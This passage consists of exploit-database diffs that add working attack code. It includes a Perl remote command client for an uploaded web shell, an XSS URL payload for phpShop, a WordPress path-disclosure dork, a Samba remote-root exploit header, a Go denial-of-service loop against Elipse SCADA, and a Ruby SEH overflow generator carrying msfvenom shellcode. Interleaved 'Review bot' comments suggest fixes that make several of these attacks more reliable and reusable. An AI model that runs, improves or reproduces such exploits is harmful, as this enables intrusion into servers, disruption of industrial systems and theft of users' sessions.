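+chomp($un);
+
+while () {
+print "\n$wa\@$un:~\$ ";
+chomp(my $cmd=<STDIN>);
+if ($cmd eq "exit")
+{
+print "Aurevoir!\n";
+exit;
+}
+my $ucmd = encode_base64("$cmd");
+my $output = $ua->get("$host/$shell?cmd=$ucmd");
+print $output->decoded_content;
+}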
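Review bot: The command channel built at `my $cmd1 = encode_base64("echo $rndstr");` and `$ua->get("$host/$shell?cmd=$ucmd");` puts raw Base64 into the query string, so any command whose encoding contains `+` is corrupted (`+` becomes a space in a query parameter, which shifts the decoded bit stream regardless of how cmd.php decodes it) and the trailing newline that `encode_base64` appends is sent along as well; use `encode_base64($cmd, '')` and percent-encode the result with `URI::Escape::uri_escape` (shipped with LWP's `URI` dependency) before interpolating, in both the verification probe and the interactive loop at the bottom. Separately, `unless (-e ($zip1 && $zip2))` only tests `$zip2`, because `&&` yields its right-hand operand, so a missing revslider.zip is not caught until the upload request; write `unless (-e $zip1 && -e $zip2)` or simply test `$update_file` after the plugin switch. `my $status` is also declared twice at file scope, which `use warnings` would flag as masking the earlier variable. `verify_hostname => 0` disables TLS certificate validation for every request; acceptable in a PoC, but it deserves a one-line comment so nobody reuses the client elsewhere.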
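--- a/platforms/php/webapps/35387.txt
+++ b/platforms/php/webapps/35387.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46561/info
+
+phpShop is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+phpShop versions 0.8.1 and prior are vulnerable.
+
+http://www.example.com/phpshop0_8_1/?page=store/XSS&%26%26%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E%3d1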
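--- a/platforms/php/webapps/35388.txt
+++ b/platforms/php/webapps/35388.txt
@@ -0,0 +1,32 @@
+WordPress - (Html5 Mp3 Player with Playlist) Plugin <= Full Path Disclosure
+~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+[+] Author : KnocKout
+[~] Contact : knockout@e-mail.com.tr
+[~] HomePage : http://h4x0resec.blogspot.com
+[~] Greetz : Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor,
+DaiMon, PRoMaX, ZoRLu, ( milw00rm.com )
+.__ _____ _______
+| |__ / | |___ __\ _ \_______ ____
+| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
+| Y \/ ^ /> <\ \_/ \ | \/\ ___/
+|___| /\____ |/__/\_ \\_____ /__| \___ >
+\/ |__| \/ \/ \/
+_____________________________
+/ _____/\_ _____/\_ ___ \
+\_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com
+/ \ | \\ \____
+/_______ //_______ / \______ /
+\/ \/ \/
+~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+|~App. : WordPress - (html5-mp3-player-with-playlist) Plugin
+|~Software: https://wordpress.org/plugins/html5-mp3-player-with-playlist/
+|~Software: https://github.com/wp-plugins/html5-mp3-player-with-playlist/tree/master/html5plus
+|~Vulnerability Style : FULL PATH DISCLOSURE
+|[~]Date : "26.11.2014"
+|[~]Tested on : Kali Linux, Windows 7
+|DORK: inurl:html5plus/html5full.php
+~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+==============[Exploitation]===============================
+
+http://[VICTIM]/wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php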
|
@ -1,3 +1,4 @@
|
|||
/*
|
||||
source: http://www.securityfocus.com/bid/7106/info
|
||||
|
||||
Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets.
|
||||
|
@ -5,6 +6,7 @@ Samba is prone to a buffer-overflow vulnerability when the 'smbd' service tries
|
|||
An attacker can exploit this vulnerability by creating a specially formatted SMB/CIFS packet and sending it to a vulnerable Samba server. The overflow condition will be triggered and will cause smbd to overwrite sensitive areas of memory with attacker-supplied values.
|
||||
|
||||
Note that the smbd service runs with root privileges.
|
||||
*/
|
||||
|
||||
/**
|
||||
** sambash -- samba <= 2.2.7a reply_nttrans() linux x86 remote root
|
||||
|
|
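--- a/platforms/windows/dos/35379.go
+++ b/platforms/windows/dos/35379.go
@@ -0,0 +1,69 @@
+// Exploit Http DoS Request for SCADA ATTACK Elipse 3
+// Mauro Risonho de Paula Assumpção aka firebits
+// mauro.risonho@gmail.com
+// 29-10-2013 11:42
+// Vendor Homepage: http://www.elipse.com.br/port/index.aspx
+// Software Link: http://www.elipse.com.br/port/e3.aspx
+// Version: 3.x and prior
+// Tested on: windows
+// CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8652
+// NVD : https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8652
+// Hard lock Dll crash in Windows 2003 SP2 + 20 requests connections
+// exploit in Golang (golang.com) C Google
+// compile and execute:
+// go build Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
+// chmod +x Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
+// ./Exploit-Http-DoS-Request-for-SCADA-ATTACK-Elipse3-PoC.go
+
+package main
+
+import (
+"fmt"
+"io/ioutil"
+"log"
+"net/http"
+)
+
+func main() {
+count := 1
+// fmt.Println ("")
+// fmt.Println (" _____.__ ___. .__ __ ")
+// fmt.Println (" _/ ____\__|______ ____\_ |__ |__|/ |_ ______ ")
+// fmt.Println (" \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ ")
+// fmt.Println (" | | | || | \/\ ___/| \_\ \ || | \___ \ ")
+// fmt.Println (" |__| |__||__| \___ >___ /__||__| /____ > ")
+// fmt.Println (" \/ \/ \/ ")
+// fmt.Println (" bits on fire. ")
+fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
+fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
+fmt.Println ("29-10-2013 11:42")
+fmt.Println ("mauro.risonho@gmail.com")
+fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
+fmt.Println ("20 requests connections per second")
+
+for {
+count += count
+//http://192.168.0.1:1681/index.html -> Elipse 3 http://<ip-elipse4><port listen: default 1681>
+
+fmt.Println ("Exploit Http DoS Request for SCADA ATTACK Elipse 3")
+fmt.Println ("Mauro Risonho de Paula Assumpção aka firebits")
+fmt.Println ("29-10-2013 11:42")
+fmt.Println ("mauro.risonho@gmail.com")
+fmt.Println ("Hard lock Dll crash in Windows 2003 SP2 + ")
+fmt.Println ("20 requests connections")
+
+fmt.Println ("Connected Port 1681...Testing")
+fmt.Println ("Counter Loops: ", count)
+
+res, err := http.Get("http://192.168.0.1:1681/index.html")
+if err != nil {
+log.Fatal(err)
+}
+robots, err := ioutil.ReadAll(res.Body)
+res.Body.Close()
+if err != nil {
+log.Fatal(err)
+}
+fmt.Printf("%s", robots)
+}
+}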
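Review bot: `count += count` inside the `for` loop doubles the counter on every pass instead of incrementing it, so the printed "Counter Loops" value is a power of two that wraps to a negative number and then sticks at 0 after about 63 requests; `count++` is what the message implies. The target `http://192.168.0.1:1681/index.html` is hard-coded in the loop, so the PoC has to be recompiled per host; reading it from `os.Args[1]` (adding `"os"` to the import block) would make it usable as distributed. `log.Fatal(err)` on the first transport error also ends the run at the moment the service stops answering, which is presumably the crash the PoC is trying to provoke, so printing the error and continuing would show whether the target recovers. The header's build instructions are also off: `go build` emits a binary named after the directory, so the `chmod +x` and `./...go` lines should refer to that binary rather than the source file.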
45
platforms/windows/local/35377.rb
Executable file
|
@ -0,0 +1,45 @@
|
|||
#!/usr/bin/env ruby
|
||||
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 (.wax) SEH Buffer Overflow
|
||||
# Date: 26.11.2014
|
||||
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
|
||||
# Vendor Homepage: not valid anymore
|
||||
# Software Link: not available
|
||||
# Version: 3.1.2.1.2010.03.30
|
||||
# Discovery: ZoRLu / zorlu@milw00rm.com
|
||||
# Tested on: Microsoft Windows XP [Version 5.1.2600]
|
||||
|
||||
filename = "3-1-2-1-gb.wax"
|
||||
|
||||
seh = 43501
|
||||
buff = "\x41" * 45000
|
||||
nops = "\x90" * 16
|
||||
|
||||
# ./msfvenom -p windows/exec CMD=calc EXITFUNC=thread -b "\x00\x0a\x0d\x0c\x20" -e x86/shikata_ga_nai -f ruby
|
||||
sc =
|
||||
"\xbe\x97\xd4\x64\xe7\xda\xdf\xd9\x74\x24\xf4\x5a\x33\xc9" +
|
||||
"\xb1\x32\x83\xc2\x04\x31\x72\x0e\x03\xe5\xda\x86\x12\xf5" +
|
||||
"\x0b\xcf\xdd\x05\xcc\xb0\x54\xe0\xfd\xe2\x03\x61\xaf\x32" +
|
||||
"\x47\x27\x5c\xb8\x05\xd3\xd7\xcc\x81\xd4\x50\x7a\xf4\xdb" +
|
||||
"\x61\x4a\x38\xb7\xa2\xcc\xc4\xc5\xf6\x2e\xf4\x06\x0b\x2e" +
|
||||
"\x31\x7a\xe4\x62\xea\xf1\x57\x93\x9f\x47\x64\x92\x4f\xcc" +
|
||||
"\xd4\xec\xea\x12\xa0\x46\xf4\x42\x19\xdc\xbe\x7a\x11\xba" +
|
||||
"\x1e\x7b\xf6\xd8\x63\x32\x73\x2a\x17\xc5\x55\x62\xd8\xf4" +
|
||||
"\x99\x29\xe7\x39\x14\x33\x2f\xfd\xc7\x46\x5b\xfe\x7a\x51" +
|
||||
"\x98\x7d\xa1\xd4\x3d\x25\x22\x4e\xe6\xd4\xe7\x09\x6d\xda" +
|
||||
"\x4c\x5d\x29\xfe\x53\xb2\x41\xfa\xd8\x35\x86\x8b\x9b\x11" +
|
||||
"\x02\xd0\x78\x3b\x13\xbc\x2f\x44\x43\x18\x8f\xe0\x0f\x8a" +
|
||||
"\xc4\x93\x4d\xc0\x1b\x11\xe8\xad\x1c\x29\xf3\x9d\x74\x18" +
|
||||
"\x78\x72\x02\xa5\xab\x37\xec\x47\x7e\x4d\x85\xd1\xeb\xec" +
|
||||
"\xc8\xe1\xc1\x32\xf5\x61\xe0\xca\x02\x79\x81\xcf\x4f\x3d" +
|
||||
"\x79\xbd\xc0\xa8\x7d\x12\xe0\xf8\x1d\xf5\x72\x60\xe2"
|
||||
|
||||
buff[seh-4,4] = "\xeb\x0e\x90\x90"
|
||||
buff[seh,4] = [0x10031659].pack("V").force_encoding("utf-8")
|
||||
buff[seh+4,nops.size] = nops
|
||||
buff[seh+(4+nops.size),sc.size] = sc
|
||||
|
||||
File.open(filename,"wb") do |fp|
|
||||
fp.write(buff)
|
||||
fp.close
|
||||
puts "Exploit file created: #(unknown) size: #{buff.size}"
|
||||
end
|
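Review bot: The `fp.close` inside the `File.open` block is redundant, since the block form closes the handle when the block exits; the line can simply be dropped. On the `puts` line that follows, `#(unknown)` is not Ruby interpolation and is printed literally, so if the output filename was meant it should read `#{filename}`. Note also that `buff.size` and `sc.size` count characters rather than bytes, and once non-ASCII bytes have been spliced into a UTF-8 string the two can differ, so `buff.bytesize` is the value that matches what was actually written to disk.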